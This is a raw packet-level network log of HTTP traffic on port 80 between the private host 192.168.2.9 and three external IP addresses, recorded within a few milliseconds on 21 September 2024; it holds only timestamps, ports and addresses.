Sep 21, 2024 14:48:10.483107090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483110905 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483119965 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483131886 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483141899 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483145952 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483155012 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483165979 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483175993 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483181000 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483189106 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483201981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483212948 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483215094 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483222961 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483225107 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483238935 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483258963 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483288050 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483571053 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483584881 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483596087 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483607054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483624935 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483628035 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.483639002 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483642101 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483655930 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483669043 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483669996 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.483696938 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483721018 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483863115 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483877897 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483896971 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483907938 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483917952 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483923912 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483931065 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483942986 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483949900 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483954906 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483967066 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483968019 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.483979940 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483989954 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.483999014 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484003067 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484015942 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484025002 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484036922 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484039068 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484050989 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484061956 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484071016 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484074116 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484090090 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484090090 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484102011 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484122038 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484122038 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484134912 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484144926 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484148026 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484154940 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484157085 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484169960 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484179974 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484185934 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484193087 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484204054 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484211922 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484215975 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484227896 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484232903 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484245062 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484252930 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484256983 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484268904 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.484280109 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484282970 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484298944 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484327078 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484339952 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.484353065 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.484364986 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.484368086 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.484376907 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.484386921 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.484388113 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484400988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484410048 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.484421968 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484433889 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484441042 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.484441996 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484446049 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484457016 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484484911 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484632969 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484644890 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484654903 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484666109 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484667063 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484678984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484704971 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484730005 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484791040 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484803915 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484814882 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484826088 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484836102 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484841108 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484848022 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484858990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484868050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484872103 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484880924 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484915972 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484944105 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.484945059 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484956980 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484968901 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484978914 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484989882 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.484994888 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485001087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485017061 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485025883 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485028028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485039949 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485044956 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485050917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485059023 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485061884 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485073090 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485091925 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485093117 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485104084 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485116959 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485122919 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485131979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485136986 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485141993 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485152006 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485161066 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485162973 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485173941 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485186100 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485188007 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485198021 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485207081 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485208988 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485222101 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485225916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485238075 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485241890 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485249043 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485260010 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485274076 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485274076 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485285044 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485296965 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485307932 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485315084 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485315084 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485318899 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485330105 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485332966 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485342979 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485353947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485363007 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485367060 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485378981 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485388994 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485390902 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485402107 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485411882 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485415936 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485419989 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485443115 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485465050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485697985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485711098 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485721111 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485738993 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485752106 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485867023 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485878944 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485889912 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485901117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485912085 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485920906 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485924006 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485935926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485939980 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485949039 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485960007 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485964060 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.485971928 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485984087 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.485992908 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486004114 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486011982 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486017942 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486026049 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486030102 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486041069 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486052990 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486062050 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486063957 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486076117 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486080885 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486088037 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486099958 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486102104 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486110926 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486121893 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486124039 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486136913 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486148119 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486150026 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486161947 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486174107 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486175060 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486186028 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486188889 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486198902 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486208916 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486217976 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486222029 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486233950 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486244917 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486248016 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486258984 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486268044 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486272097 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486283064 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486288071 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486294985 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486305952 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486305952 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486319065 CEST	80	49711	147.45.44.104	192.168.2.9
Sep 21, 2024 14:48:10.486331940 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486334085 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486346006 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486357927 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486360073 CEST	49711	80	192.168.2.9	147.45.44.104
Sep 21, 2024 14:48:10.486368895 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486380100 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486382008 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486394882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486403942 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486407995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486421108 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486428976 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486433983 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486444950 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486445904 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486476898 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486500978 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486726999 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486741066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486778021 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486887932 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486901045 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486911058 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486922979 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486929893 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486934900 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486948013 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.486958981 CEST	80	49712	103.130.147.211	192.168.2.9
Sep 21, 2024 14:48:10.486969948 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486975908 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486980915 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.486989021 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.486991882 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487004995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487016916 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487025976 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487027884 CEST	49712	80	192.168.2.9	103.130.147.211
Sep 21, 2024 14:48:10.487039089 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487041950 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487055063 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487062931 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487066984 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487078905 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487087965 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487091064 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487102985 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487111092 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487114906 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487127066 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487138033 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487139940 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487150908 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487152100 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487164974 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487170935 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487179995 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487191916 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487199068 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487205029 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487216949 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487227917 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487231016 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487241983 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487243891 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487257957 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487263918 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487270117 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487282991 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487293005 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487301111 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487312078 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487323046 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487328053 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487334967 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487344980 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487346888 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487360001 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487371922 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487380028 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487394094 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487404108 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487407923 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487417936 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487421989 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487432957 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487443924 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487457037 CEST	80	49713	176.113.115.33	192.168.2.9
Sep 21, 2024 14:48:10.487457991 CEST	49713	80	192.168.2.9	176.113.115.33
Sep 21, 2024 14:48:10.487469912 CEST	80	49713	176.113.115.33	192.168.2.9
